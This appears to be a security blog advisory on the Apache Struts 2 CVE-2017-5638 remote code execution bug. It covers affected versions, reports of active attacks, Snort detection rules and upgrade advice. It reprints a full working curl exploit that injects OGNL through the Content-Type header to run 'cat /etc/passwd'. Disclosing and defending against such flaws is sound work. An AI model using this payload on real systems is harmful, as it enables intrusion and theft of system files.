Upgrade now, some attacks are already in progress!

Another serious vulnerability was discovered in Apache Struts 2.

Affected versions

Apache Struts 2.3.5–2.3.31
Apache Struts 2.5–2.5.10

The vulnerability

The vulnerability (CVE-2017–5638), firstly reported by the security researcher Nike Zheng, is a remote code execution bug that affects the Jakarta Multipart parser in Apache Struts, as reported in this security advisory:

It is possible to perform a RCE attack with a malicious Content-Type value. If the Content-Type value isn't valid an exception is thrown which is then used to display an error message to a user.

The researchers have also seen malicious attacks which turn off firewall processes on the target and drop payloads:

“The payloads have varied but include an IRC bouncer, a DoS bot, and a sample related to the bill gates botnet”.

Technical analysis was released by the major security firms:

Cisco’s Talos

Content-Type: Malicious - New Apache 0-day Under Attack
This Post Authored by Nick Biasini Talos has observed a new Apache vulnerability that is being actively exploited in…blog.talosintelligence.com

Talos has also released some Snort rules that can detect exploitation attemps of the vulnerability(41818, 41819): https://snort.org/advisories/talos-rules-2017-03-07-3-7-2017.

Talos suggest to upgrade ASAP, because the researchers found

“a high number of exploitation events. The majority of the exploitation attempts seem to be leveraging a publicly released proof of concept that is being used to run various commands”.

The proof of concept was released by Qualys.

Qualys

[embed]https://threatprotect.qualys.com/2017/03/08/apache-struts-jakarta-multipart-parser-remote-code-execution-vulnerability/[/embed]

Qualsys releases the proof-of-concept that can check the vulnerability using CURL:

For our analysis, we have used below curl command to replicate the issue:

curl -i -v -s -k -X $'GET' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0' -H $'Content-Type:%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cat /etc/passwd').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}' $'http://10.10.36.22:8080/struts2-blank/example/HelloWorld.action'

It is important to note that the presence of vulnerable code is enough to exploit the vulnerability. The web application doesn’t necessary need to implement file upload functionality to exploit this vulnerability.

On Rapid7 GitHub repository is also available a python script to check the vulnerability:

[embed]https://github.com/rapid7/metasploit-framework/issues/8064[/embed]

[embed]https://gist.github.com/andreafortuna/23792e573fe6f72c843f8f9598db0325[/embed]

Remediations?

This vulnerability has been fixed Struts 2.3.32 and 2.5.10.1, so…upgrade ASAP!